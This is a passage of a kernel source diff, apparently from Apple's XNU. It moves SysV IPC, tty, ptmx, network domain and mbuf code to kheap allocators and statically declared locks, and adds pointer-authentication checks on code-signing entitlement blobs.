                                        suptr->un_cnt--;
                                        *suepptr = sueptr->une_next;
-                                       FREE(sueptr, M_SYSVSEM);
+                                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                                        sueptr = *suepptr;
                                        continue;
                                }
@@ -1533,8 +1510,7 @@ semexit(struct proc *p)
 #endif
                        suptr->un_cnt--;
                        suptr->un_ent = sueptr->une_next;
-                       FREE(sueptr, M_SYSVSEM);
-                       sueptr = NULL;
+                       kheap_free(KM_SYSVSEM, sueptr, sizeof(struct undo));
                }
        }
 
index 7e778e60d97158e60ad4e25393ec5b2225dded6b..a3a6ea9330897713f2c53339de19b197bd42fc34 100644 (file)
 #if SYSV_SHM
 static int shminit(void);
 
-static lck_grp_t       *sysv_shm_subsys_lck_grp;
-static lck_grp_attr_t  *sysv_shm_subsys_lck_grp_attr;
-static lck_attr_t      *sysv_shm_subsys_lck_attr;
-static lck_mtx_t        sysv_shm_subsys_mutex;
+static LCK_GRP_DECLARE(sysv_shm_subsys_lck_grp, "sysv_shm_subsys_lock");
+static LCK_MTX_DECLARE(sysv_shm_subsys_mutex, &sysv_shm_subsys_lck_grp);
 
 #define SYSV_SHM_SUBSYS_LOCK() lck_mtx_lock(&sysv_shm_subsys_mutex)
 #define SYSV_SHM_SUBSYS_UNLOCK() lck_mtx_unlock(&sysv_shm_subsys_mutex)
@@ -183,8 +181,6 @@ struct shminfo shminfo = {
 
 #endif /* __APPLE_API_PRIVATE */
 
-void sysv_shm_lock_init(void);
-
 static __inline__ time_t
 sysv_shmtime(void)
 {
@@ -277,7 +273,7 @@ shm_deallocate_segment(struct shmid_kernel *shmseg)
            shm_handle = shm_handle_next) {
                shm_handle_next = shm_handle->shm_handle_next;
                mach_memory_entry_port_release(shm_handle->shm_object);
-               FREE(shm_handle, M_SHM);
+               kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle));
        }
        shmseg->u.shm_internal = USER_ADDR_NULL;                /* tunnel */
        size = vm_map_round_page(shmseg->u.shm_segsz,
@@ -421,7 +417,7 @@ shmat(struct proc *p, struct shmat_args *uap, user_addr_t *retval)
                        goto shmat_out;
                }
 
-               MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK | M_NULL);
+               shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK);
                if (shmmap_s == NULL) {
                        shmat_ret = ENOMEM;
                        goto shmat_out;
@@ -838,7 +834,7 @@ shmget_allocate_segment(struct proc *p, struct shmget_args *uap, int mode,
                        goto out;
                }
 
-               MALLOC(shm_handle, struct shm_handle *, sizeof(struct shm_handle), M_SHM, M_WAITOK);
+               shm_handle = kheap_alloc(KM_SHM, sizeof(struct shm_handle), Z_WAITOK);
                if (shm_handle == NULL) {
                        kret = KERN_NO_SPACE;
                        mach_memory_entry_port_release(mem_object);
@@ -891,7 +887,7 @@ out:
                    shm_handle = shm_handle_next) {
                        shm_handle_next = shm_handle->shm_handle_next;
                        mach_memory_entry_port_release(shm_handle->shm_object);
-                       FREE(shm_handle, M_SHM);
+                       kheap_free(KM_SHM, shm_handle, sizeof(struct shm_handle));
                }
                shmseg->u.shm_internal = USER_ADDR_NULL; /* tunnel */
        }
@@ -1006,7 +1002,7 @@ shmfork(struct proc *p1, struct proc *p2)
                ret = 1;
                goto shmfork_out;
        }
-       MALLOC(shmmap_s, struct shmmap_state *, size, M_SHM, M_WAITOK);
+       shmmap_s = kheap_alloc(KM_SHM, size, Z_WAITOK);
        if (shmmap_s == NULL) {
                ret = 1;
                goto shmfork_out;
@@ -1029,11 +1025,14 @@ static void
 shmcleanup(struct proc *p, int deallocate)
 {
        struct shmmap_state *shmmap_s;
+       size_t size = 0;
+       int nsegs = 0;
 
        SYSV_SHM_SUBSYS_LOCK();
 
        shmmap_s = (struct shmmap_state *)p->vm_shm;
        for (; shmmap_s->shmid != SHMID_SENTINEL; shmmap_s++) {
+               nsegs++;
                if (SHMID_IS_VALID(shmmap_s->shmid)) {
                        /*
                         * XXX: Should the MAC framework enforce
@@ -1043,8 +1042,10 @@ shmcleanup(struct proc *p, int deallocate)
                }
        }
 
-       FREE(p->vm_shm, M_SHM);
-       p->vm_shm = NULL;
+       if (os_add_and_mul_overflow(nsegs, 1, sizeof(struct shmmap_state), &size)) {
+               panic("shmcleanup: p->vm_shm buffer was correupted\n");
+       }
+       kheap_free(KM_SHM, p->vm_shm, size);
        SYSV_SHM_SUBSYS_UNLOCK();
 }
 
@@ -1084,7 +1085,7 @@ shminit(void)
                        return ENOMEM;
                }
 
-               MALLOC(shmsegs, struct shmid_kernel *, sz, M_SHM, M_WAITOK | M_ZERO);
+               shmsegs = zalloc_permanent(sz, ZALIGN_PTR);
                if (shmsegs == NULL) {
                        return ENOMEM;
                }
@@ -1104,18 +1105,6 @@ shminit(void)
        return 0;
 }
 
-/* Initialize the mutex governing access to the SysV shm subsystem */
-__private_extern__ void
-sysv_shm_lock_init( void )
-{
-       sysv_shm_subsys_lck_grp_attr = lck_grp_attr_alloc_init();
-
-       sysv_shm_subsys_lck_grp = lck_grp_alloc_init("sysv_shm_subsys_lock", sysv_shm_subsys_lck_grp_attr);
-
-       sysv_shm_subsys_lck_attr = lck_attr_alloc_init();
-       lck_mtx_init(&sysv_shm_subsys_mutex, sysv_shm_subsys_lck_grp, sysv_shm_subsys_lck_attr);
-}
-
 /* (struct sysctl_oid *oidp, void *arg1, int arg2, \
  *       struct sysctl_req *req) */
 static int
index 14858edc59f8860609db610937c435229409f25e..400a97a948bbcf20d4f8e24e2ac5ac35750b862d 100644 (file)
 0x14000E8      MACH_AMP_RECOMMENDATION_CHANGE
 0x14000EC      MACH_AMP_PERFCTL_POLICY_CHANGE
 0x1400100      MACH_TURNSTILE_KERNEL_CHANGE
+0x140010C      MACH_SET_RT_DEADLINE
+0x1400110      MACH_CANCEL_RT_DEADLINE
 0x1400140      MACH_PSET_AVG_EXEC_TIME
 0x1500000      MACH_MSGID_INVALID
 0x1600000      MTX_SLEEP
 0x313016C      VFS_label_associate_fdesc
 0x3130170      VFS_mount_check_snapshot_mount
 0x3130174      VFS_check_supplemental_signature
+0X3134000      VFS_io_compression_stats
 0x3CF0000      CP_OFFSET_IO
 0x4010004      proc_exit
 0x4010008      force_exit
 0x01ab000c     WORKGROUP_INTERVAL_START
 0x01ab0010     WORKGROUP_INTERVAL_UPDATE
 0x01ab0014     WORKGROUP_INTERVAL_FINISH
+0x01ac0000     HV_GUEST_ENTER
+0x01ac0004     HV_GUEST_ERROR
 0x1e000000     SEC_ENTROPY_READ0
 0x1e000004     SEC_ENTROPY_READ1
 0x1e000008     SEC_ENTROPY_READ2
index fbb861b00521fb0ba0c821e407a4f5b0e23f8cad..ba9f72cfb54a5c3af14f740939b1c692f65750d3 100644 (file)
 #include <kern/waitq.h>
 #include <libkern/section_keywords.h>
 
-static lck_grp_t        *tty_lck_grp;
-static lck_grp_attr_t   *tty_lck_grp_attr;
-static lck_attr_t      *tty_lck_attr;
+static LCK_GRP_DECLARE(tty_lck_grp, "tty");
 
 __private_extern__ int ttnread(struct tty *tp);
 static void     ttyecho(int c, struct tty *tp);
@@ -260,32 +258,6 @@ termios64to32(struct user_termios *in, struct termios32 *out)
 }
 
 
-/*
- * tty_init
- *
- * Initialize the tty line discipline subsystem.
- *
- * Parameters: void
- *
- * Returns:    void
- *
- * Locks:      No ttys can be allocated and no tty locks can be used
- *             until after this function is called
- *
- * Notes:      The intent of this is to set up a log group attribute,
- *             lock group, and loc atribute for subsequent per-tty locks.
- *             This function is called early in bsd_init(), prior to the
- *             console device initialization.
- */
-void
-tty_init(void)
-{
-       tty_lck_grp_attr = lck_grp_attr_alloc_init();
-       tty_lck_grp = lck_grp_alloc_init("tty", tty_lck_grp_attr);
-       tty_lck_attr = lck_attr_alloc_init();
-}
-
-
 /*
  * tty_lock
  *
@@ -3198,14 +3170,14 @@ ttymalloc(void)
 {
        struct tty *tp;
 
-       MALLOC(tp, struct tty *, sizeof(struct tty), M_TTYS, M_WAITOK | M_ZERO);
+       tp = kheap_alloc(KM_TTYS, sizeof(struct tty), Z_WAITOK | Z_ZERO);
        if (tp != NULL) {
                /* XXX: default to TTYCLSIZE(1024) chars for now */
                clalloc(&tp->t_rawq, TTYCLSIZE, 1);
                clalloc(&tp->t_canq, TTYCLSIZE, 1);
                /* output queue doesn't need quoting */
                clalloc(&tp->t_outq, TTYCLSIZE, 0);
-               lck_mtx_init(&tp->t_lock, tty_lck_grp, tty_lck_attr);
+               lck_mtx_init(&tp->t_lock, &tty_lck_grp, LCK_ATTR_NULL);
                klist_init(&tp->t_rsel.si_note);
                klist_init(&tp->t_wsel.si_note);
                tp->t_refcnt = 1;
@@ -3263,8 +3235,8 @@ ttydeallocate(struct tty *tp)
        clfree(&tp->t_rawq);
        clfree(&tp->t_canq);
        clfree(&tp->t_outq);
-       lck_mtx_destroy(&tp->t_lock, tty_lck_grp);
-       FREE(tp, M_TTYS);
+       lck_mtx_destroy(&tp->t_lock, &tty_lck_grp);
+       kheap_free(KM_TTYS, tp, sizeof(struct tty));
 }
 
 
index d4efb5c12f5a7d6741396b8afb53e22b162bce5e..f505e9243127945181f1e4833166b5f0ae16d06e 100644 (file)
@@ -290,13 +290,14 @@ ptmx_get_ioctl(int minor, int open_flag)
                }
                DEVFS_UNLOCK();
 
-               MALLOC(new_ptmx_ioctl, struct ptmx_ioctl *, sizeof(struct ptmx_ioctl), M_TTYS, M_WAITOK | M_ZERO);
+               new_ptmx_ioctl = kheap_alloc(KM_TTYS, sizeof(struct ptmx_ioctl),
+                   Z_WAITOK | Z_ZERO);
                if (new_ptmx_ioctl == NULL) {
                        return NULL;
                }
 
                if ((new_ptmx_ioctl->pt_tty = ttymalloc()) == NULL) {
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
@@ -315,7 +316,7 @@ ptmx_get_ioctl(int minor, int open_flag)
                if ((_state.pis_total - _state.pis_free) >= ptmx_max) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
@@ -323,39 +324,42 @@ ptmx_get_ioctl(int minor, int open_flag)
                if (_state.pis_free == 0) {
                        struct ptmx_ioctl **new_pis_ioctl_list;
                        struct ptmx_ioctl **old_pis_ioctl_list = NULL;
+                       size_t old_pis_total = 0;
 
                        /* Yes. */
-                       MALLOC(new_pis_ioctl_list, struct ptmx_ioctl **, sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR), M_TTYS, M_WAITOK | M_ZERO);
+                       new_pis_ioctl_list = kheap_alloc(KM_TTYS,
+                           sizeof(struct ptmx_ioctl *) * (_state.pis_total + PTMX_GROW_VECTOR),
+                           Z_WAITOK | Z_ZERO);
                        if (new_pis_ioctl_list == NULL) {
                                ttyfree(new_ptmx_ioctl->pt_tty);
                                DEVFS_UNLOCK();
-                               FREE(new_ptmx_ioctl, M_TTYS);
+                               kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                                return NULL;
                        }
 
                        /* If this is not the first time, copy the old over */
                        bcopy(_state.pis_ioctl_list, new_pis_ioctl_list, sizeof(struct ptmx_ioctl *) * _state.pis_total);
                        old_pis_ioctl_list = _state.pis_ioctl_list;
+                       old_pis_total = _state.pis_total;
                        _state.pis_ioctl_list = new_pis_ioctl_list;
                        _state.pis_free += PTMX_GROW_VECTOR;
                        _state.pis_total += PTMX_GROW_VECTOR;
-                       if (old_pis_ioctl_list) {
-                               FREE(old_pis_ioctl_list, M_TTYS);
-                       }
+                       kheap_free(KM_TTYS, old_pis_ioctl_list,
+                           sizeof(struct ptmx_ioctl *) * old_pis_total);
                }
 
                /* is minor in range now? */
                if (minor < 0 || minor >= _state.pis_total) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
                        return NULL;
                }
 
                if (_state.pis_ioctl_list[minor] != NULL) {
                        ttyfree(new_ptmx_ioctl->pt_tty);
                        DEVFS_UNLOCK();
-                       FREE(new_ptmx_ioctl, M_TTYS);
+                       kheap_free(KM_TTYS, new_ptmx_ioctl, sizeof(struct ptmx_ioctl));
 
                        /* Special error value so we know to redrive the open, we've been raced */
                        return (struct ptmx_ioctl*)-1;
@@ -437,7 +441,7 @@ ptmx_free_ioctl(int minor, int open_flag)
                        devfs_remove(old_ptmx_ioctl->pt_devhandle);
                }
                ttyfree(old_ptmx_ioctl->pt_tty);
-               FREE(old_ptmx_ioctl, M_TTYS);
+               kheap_free(KM_TTYS, old_ptmx_ioctl, sizeof(struct ptmx_ioctl));
        }
 
        return 0;     /* Success */
index 8304c009d34845c7d3e0f10f93319a6245df89f8..320e71ef766264e571e5ceb482d1bf4d2136a931 100644 (file)
@@ -777,6 +777,11 @@ csblob_get_entitlements(struct cs_blob *csblob, void **out_start, size_t *out_le
        }
 
        csblob->csb_hashtype->cs_init(&context);
+       ptrauth_utils_auth_blob_generic(entitlements,
+           ntohl(entitlements->length),
+           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+           PTRAUTH_ADDR_DIVERSIFY,
+           csblob->csb_entitlements_blob_signature);
        csblob->csb_hashtype->cs_update(&context, entitlements, ntohl(entitlements->length));
        csblob->csb_hashtype->cs_final(computed_hash, &context);
 
@@ -3082,6 +3087,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona
 
        if (blob->csb_entitlements_blob) {
                /* We need to add a slot for the entitlements */
+               ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY,
+                   blob->csb_entitlements_blob_signature);
+
                new_blob_size += sizeof(CS_BlobIndex);
                new_blob_size += ntohl(blob->csb_entitlements_blob->length);
        }
@@ -3112,6 +3123,12 @@ ubc_cs_reconstitute_code_signature(struct cs_blob const *blob, vm_size_t optiona
                new_superblob->index[1].type = htonl(CSSLOT_ENTITLEMENTS);
                new_superblob->index[1].offset = htonl((uint32_t)ent_offset);
 
+               ptrauth_utils_auth_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY,
+                   blob->csb_entitlements_blob_signature);
+
                memcpy((void *)(new_blob_addr + ent_offset), blob->csb_entitlements_blob, ntohl(blob->csb_entitlements_blob->length));
 
                new_cd = (CS_CodeDirectory *)(new_blob_addr + cd_offset);
@@ -3242,12 +3259,18 @@ ubc_cs_convert_to_multilevel_hash(struct cs_blob *blob)
        }
 
        /* New Code Directory is ready for use, swap it out in the blob structure */
-       ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
+       ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
 
        blob->csb_mem_size = new_blob_size;
-       blob->csb_mem_kaddr = new_blob_addr;
+       blob->csb_mem_kaddr = (void *)new_blob_addr;
        blob->csb_cd = cd;
        blob->csb_entitlements_blob = entitlements;
+       if (blob->csb_entitlements_blob != NULL) {
+               blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                   ntohl(blob->csb_entitlements_blob->length),
+                   OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                   PTRAUTH_ADDR_DIVERSIFY);
+       }
 
        /* The blob has some cached attributes of the Code Directory, so update those */
 
@@ -3301,7 +3324,7 @@ cs_blob_create_validated(
        /* fill in the new blob */
        blob->csb_mem_size = size;
        blob->csb_mem_offset = 0;
-       blob->csb_mem_kaddr = *addr;
+       blob->csb_mem_kaddr = (void *)*addr;
        blob->csb_flags = 0;
        blob->csb_signer_type = CS_SIGNER_TYPE_UNKNOWN;
        blob->csb_platform_binary = 0;
@@ -3339,6 +3362,12 @@ cs_blob_create_validated(
 
                blob->csb_cd = cd;
                blob->csb_entitlements_blob = entitlements; /* may be NULL, not yet validated */
+               if (blob->csb_entitlements_blob != NULL) {
+                       blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                           ntohl(blob->csb_entitlements_blob->length),
+                           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                           PTRAUTH_ADDR_DIVERSIFY);
+               }
                blob->csb_hashtype = cs_find_md(cd->hashType);
                if (blob->csb_hashtype == NULL || blob->csb_hashtype->cs_digest_size > sizeof(hash)) {
                        panic("validated CodeDirectory but unsupported type");
@@ -3412,8 +3441,8 @@ cs_blob_free(
 {
        if (blob != NULL) {
                if (blob->csb_mem_kaddr) {
-                       ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
-                       blob->csb_mem_kaddr = 0;
+                       ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
+                       blob->csb_mem_kaddr = NULL;
                }
                if (blob->csb_entitlements != NULL) {
                        osobject_release(blob->csb_entitlements);
@@ -3547,12 +3576,18 @@ ubc_cs_blob_add(
                        goto out;
                }
 
-               ubc_cs_blob_deallocate(blob->csb_mem_kaddr, blob->csb_mem_size);
+               ubc_cs_blob_deallocate((vm_offset_t)blob->csb_mem_kaddr, blob->csb_mem_size);
 
-               blob->csb_mem_kaddr = new_mem_kaddr;
+               blob->csb_mem_kaddr = (void *)new_mem_kaddr;
                blob->csb_mem_size = new_mem_size;
                blob->csb_cd = new_cd;
                blob->csb_entitlements_blob = new_entitlements;
+               if (blob->csb_entitlements_blob != NULL) {
+                       blob->csb_entitlements_blob_signature = ptrauth_utils_sign_blob_generic(blob->csb_entitlements_blob,
+                           ntohl(blob->csb_entitlements_blob->length),
+                           OS_PTRAUTH_DISCRIMINATOR("cs_blob.csb_entitlements_blob_signature"),
+                           PTRAUTH_ADDR_DIVERSIFY);
+               }
                blob->csb_reconstituted = true;
        }
 #endif
@@ -4379,7 +4414,7 @@ cs_validate_hash(
                }
 
                /* blob data has been released */
-               kaddr = blob->csb_mem_kaddr;
+               kaddr = (vm_offset_t)blob->csb_mem_kaddr;
                if (kaddr == 0) {
                        continue;
                }
index c1f6a3efbf4aa962bf14018beea8801797b9436f..0a6b54ed9edfeead8993785b3d6d9de4aa0a026a 100644 (file)
@@ -100,11 +100,12 @@ static boolean_t domain_draining;
 static void domain_sched_timeout(void);
 static void domain_timeout(void *);
 
-lck_grp_t       *domain_proto_mtx_grp;
-lck_attr_t      *domain_proto_mtx_attr;
-static lck_grp_attr_t   *domain_proto_mtx_grp_attr;
-decl_lck_mtx_data(static, domain_proto_mtx);
-decl_lck_mtx_data(static, domain_timeout_mtx);
+static LCK_GRP_DECLARE(domain_proto_mtx_grp, "domain");
+static LCK_ATTR_DECLARE(domain_proto_mtx_attr, 0, 0);
+static LCK_MTX_DECLARE_ATTR(domain_proto_mtx,
+    &domain_proto_mtx_grp, &domain_proto_mtx_attr);
+static LCK_MTX_DECLARE_ATTR(domain_timeout_mtx,
+    &domain_proto_mtx_grp, &domain_proto_mtx_attr);
 
 u_int64_t _net_uptime;
 u_int64_t _net_uptime_ms;
@@ -196,8 +197,8 @@ init_domain(struct domain *dp)
        VERIFY(dp->dom_flags & DOM_ATTACHED);
 
        if (!(dp->dom_flags & DOM_INITIALIZED)) {
-               lck_mtx_init(&dp->dom_mtx_s, domain_proto_mtx_grp,
-                   domain_proto_mtx_attr);
+               lck_mtx_init(&dp->dom_mtx_s, &domain_proto_mtx_grp,
+                   &domain_proto_mtx_attr);
                dp->dom_mtx = &dp->dom_mtx_s;
                TAILQ_INIT(&dp->dom_protosw);
                if (dp->dom_init != NULL) {
@@ -290,7 +291,7 @@ net_add_domain_old(struct domain_old *odp)
                /* NOTREACHED */
        }
 
-       dp = _MALLOC(sizeof(*dp), M_TEMP, M_WAITOK | M_ZERO);
+       dp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct domain), Z_WAITOK | Z_ZERO);
        if (dp == NULL) {
                /*
                 * There is really nothing better than to panic here,
@@ -360,15 +361,15 @@ net_del_domain_old(struct domain_old *odp)
                TAILQ_FOREACH_SAFE(pp1, &dp1->dom_protosw, pr_entry, pp2) {
                        detach_proto(pp1, dp1);
                        if (pp1->pr_usrreqs->pru_flags & PRUF_OLD) {
-                               FREE(pp1->pr_usrreqs, M_TEMP);
+                               kheap_free(KHEAP_DEFAULT, pp1->pr_usrreqs, sizeof(struct pr_usrreqs));
                        }
                        if (pp1->pr_flags & PR_OLD) {
-                               FREE(pp1, M_TEMP);
+                               kheap_free(KHEAP_DEFAULT, pp1, sizeof(struct protosw));
                        }
                }
 
                detach_domain(dp1);
-               FREE(dp1, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, dp1, sizeof(struct domain));
        } else {
                error = EPFNOSUPPORT;
        }
@@ -485,7 +486,8 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp)
                /* NOTREACHED */
        }
 
-       pru = _MALLOC(sizeof(*pru), M_TEMP, M_WAITOK | M_ZERO);
+       pru = kheap_alloc(KHEAP_DEFAULT, sizeof(struct pr_usrreqs),
+           Z_WAITOK | Z_ZERO);
        if (pru == NULL) {
                error = ENOMEM;
                goto done;
@@ -513,7 +515,7 @@ net_add_proto_old(struct protosw_old *opp, struct domain_old *odp)
        pru->pru_soreceive      = opru->pru_soreceive;
        pru->pru_sopoll         = opru->pru_sopoll;
 
-       pp = _MALLOC(sizeof(*pp), M_TEMP, M_WAITOK | M_ZERO);
+       pp = kheap_alloc(KHEAP_DEFAULT, sizeof(struct protosw), Z_WAITOK | Z_ZERO);
        if (pp == NULL) {
                error = ENOMEM;
                goto done;
@@ -559,12 +561,8 @@ done:
                    "error %d\n", __func__, odp->dom_family,
                    odp->dom_name, opp->pr_protocol, error);
 
-               if (pru != NULL) {
-                       FREE(pru, M_TEMP);
-               }
-               if (pp != NULL) {
-                       FREE(pp, M_TEMP);
-               }
+               kheap_free(KHEAP_DEFAULT, pru, sizeof(struct pr_usrreqs));
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
        domain_guard_release(guard);
@@ -602,10 +600,10 @@ net_del_proto(int type, int protocol, struct domain *dp)
 
        detach_proto(pp, dp);
        if (pp->pr_usrreqs->pru_flags & PRUF_OLD) {
-               FREE(pp->pr_usrreqs, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs));
        }
        if (pp->pr_flags & PR_OLD) {
-               FREE(pp, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
        return 0;
@@ -653,10 +651,10 @@ net_del_proto_old(int type, int protocol, struct domain_old *odp)
        }
        detach_proto(pp, dp);
        if (pp->pr_usrreqs->pru_flags & PRUF_OLD) {
-               FREE(pp->pr_usrreqs, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp->pr_usrreqs, sizeof(struct pr_usrreqs));
        }
        if (pp->pr_flags & PR_OLD) {
-               FREE(pp, M_TEMP);
+               kheap_free(KHEAP_DEFAULT, pp, sizeof(struct protosw));
        }
 
 done:
@@ -736,23 +734,6 @@ domaininit(void)
        domain_guard_t guard;
 
        eventhandler_lists_ctxt_init(&protoctl_evhdlr_ctxt);
-       /*
-        * allocate lock group attribute and group for domain mutexes
-        */
-       domain_proto_mtx_grp_attr = lck_grp_attr_alloc_init();
-
-       domain_proto_mtx_grp = lck_grp_alloc_init("domain",
-           domain_proto_mtx_grp_attr);
-
-       /*
-        * allocate the lock attribute for per domain mutexes
-        */
-       domain_proto_mtx_attr = lck_attr_alloc_init();
-
-       lck_mtx_init(&domain_proto_mtx, domain_proto_mtx_grp,
-           domain_proto_mtx_attr);
-       lck_mtx_init(&domain_timeout_mtx, domain_proto_mtx_grp,
-           domain_proto_mtx_attr);
 
        guard = domain_guard_deploy();
        /*
index ab5dbd3246aeedc7f4d196b4d956ec8722338def..f73bcbda505b293d63cc504655b4b407010d8e91 100644 (file)
@@ -80,6 +80,8 @@
 #include <sys/domain.h>
 #include <sys/queue.h>
 #include <sys/proc.h>
+#include <sys/filedesc.h>
+#include <sys/file_internal.h>
 
 #include <dev/random/randomdev.h>
 
@@ -88,7 +90,7 @@
 #include <kern/queue.h>
 #include <kern/sched_prim.h>
 #include <kern/backtrace.h>
-#include <kern/cpu_number.h>
+#include <kern/percpu.h>
 #include <kern/zalloc.h>
 
 #include <libkern/OSAtomic.h>
@@ -96,6 +98,7 @@
 #include <libkern/libkern.h>
 
 #include <os/log.h>
+#include <os/ptrtools.h>
 
 #include <IOKit/IOMapper.h>
 
 
 /* TODO: should be in header file */
 /* kernel translater */
-extern vm_offset_t kmem_mb_alloc(vm_map_t, int, int, kern_return_t *);
 extern ppnum_t pmap_find_phys(pmap_t pmap, addr64_t va);
 extern vm_map_t mb_map;         /* special map */
 
@@ -325,11 +327,9 @@ static const char *mb_kmem_stats_labels[] = { "INVALID_ARGUMENT",
                                              "OTHERS" };
 
 /* Global lock */
-decl_lck_mtx_data(static, mbuf_mlock_data);
-static lck_mtx_t *mbuf_mlock = &mbuf_mlock_data;
-static lck_attr_t *mbuf_mlock_attr;
-static lck_grp_t *mbuf_mlock_grp;
-static lck_grp_attr_t *mbuf_mlock_grp_attr;
+static LCK_GRP_DECLARE(mbuf_mlock_grp, "mbuf");
+static LCK_MTX_DECLARE(mbuf_mlock_data, &mbuf_mlock_grp);
+static lck_mtx_t *const mbuf_mlock = &mbuf_mlock_data;
 
 /* Back-end (common) layer */
 static uint64_t mb_expand_cnt;
@@ -577,11 +577,9 @@ static struct mtrace *mleak_traces;
 static struct mtrace *mleak_top_trace[MLEAK_NUM_TRACES];
 
 /* Lock to protect mleak tables from concurrent modification */
-decl_lck_mtx_data(static, mleak_lock_data);
-static lck_mtx_t *mleak_lock = &mleak_lock_data;
-static lck_attr_t *mleak_lock_attr;
-static lck_grp_t *mleak_lock_grp;
-static lck_grp_attr_t *mleak_lock_grp_attr;
+static LCK_GRP_DECLARE(mleak_lock_grp, "mleak_lock");
+static LCK_MTX_DECLARE(mleak_lock_data, &mleak_lock_grp);
+static lck_mtx_t *const mleak_lock = &mleak_lock_data;
 
 /* *Failed* large allocations. */
 struct mtracelarge {
@@ -596,11 +594,8 @@ static struct mtracelarge mtracelarge_table[MTRACELARGE_NUM_TRACES];
 static void mtracelarge_register(size_t size);
 
 /* Lock to protect the completion callback table */
-static lck_grp_attr_t *mbuf_tx_compl_tbl_lck_grp_attr = NULL;
-static lck_attr_t *mbuf_tx_compl_tbl_lck_attr = NULL;
-static lck_grp_t *mbuf_tx_compl_tbl_lck_grp = NULL;
-decl_lck_rw_data(, mbuf_tx_compl_tbl_lck_rw_data);
-lck_rw_t *mbuf_tx_compl_tbl_lock = &mbuf_tx_compl_tbl_lck_rw_data;
+static LCK_GRP_DECLARE(mbuf_tx_compl_tbl_lck_grp, "mbuf_tx_compl_tbl");
+LCK_RW_DECLARE(mbuf_tx_compl_tbl_lock, &mbuf_tx_compl_tbl_lck_grp);
 
 extern u_int32_t high_sb_max;
 
@@ -1028,24 +1023,14 @@ struct mbstat mbstat;
  * anything beyond that (up to type 255) is considered a corner case.
  */
 typedef struct {
-       unsigned int    cpu_mtypes[MT_MAX];
-} __attribute__((aligned(MAX_CPU_CACHE_LINE_SIZE), packed)) mtypes_cpu_t;
-
-typedef struct {
-       mtypes_cpu_t    mbs_cpu[1];
+       unsigned int cpu_mtypes[MT_MAX];
 } mbuf_mtypes_t;
 
-static mbuf_mtypes_t *mbuf_mtypes;      /* per-CPU statistics */
-
-#define MBUF_MTYPES_SIZE(n) \
-       __builtin_offsetof(mbuf_mtypes_t, mbs_cpu[n])
-
-#define MTYPES_CPU(p) \
-       ((mtypes_cpu_t *)(void *)((char *)(p) + MBUF_MTYPES_SIZE(cpu_number())))
+static mbuf_mtypes_t PERCPU_DATA(mbuf_mtypes);
 
 #define mtype_stat_add(type, n) {                                       \
        if ((unsigned)(type) < MT_MAX) {                                \
-               mtypes_cpu_t *mbs = MTYPES_CPU(mbuf_mtypes);            \
+               mbuf_mtypes_t *mbs = PERCPU_GET(mbuf_mtypes);           \
                atomic_add_32(&mbs->cpu_mtypes[type], n);               \
        } else if ((unsigned)(type) < (unsigned)MBSTAT_MTYPES_MAX) {    \
                atomic_add_16((int16_t *)&mbstat.m_mtypes[type], n);    \
@@ -1059,29 +1044,23 @@ static mbuf_mtypes_t *mbuf_mtypes;      /* per-CPU statistics */
 static void
 mbuf_mtypes_sync(boolean_t locked)
 {
-       int m, n;
-       mtypes_cpu_t mtc;
+       mbuf_mtypes_t mtc;
 
        if (locked) {
                LCK_MTX_ASSERT(mbuf_mlock, LCK_MTX_ASSERT_OWNED);
        }
 
-       bzero(&mtc, sizeof(mtc));
-       for (m = 0; m < ncpu; m++) {
-               mtypes_cpu_t *scp = &mbuf_mtypes->mbs_cpu[m];
-               mtypes_cpu_t temp;
-
-               bcopy(&scp->cpu_mtypes, &temp.cpu_mtypes,
-                   sizeof(temp.cpu_mtypes));
-
-               for (n = 0; n < MT_MAX; n++) {
-                       mtc.cpu_mtypes[n] += temp.cpu_mtypes[n];
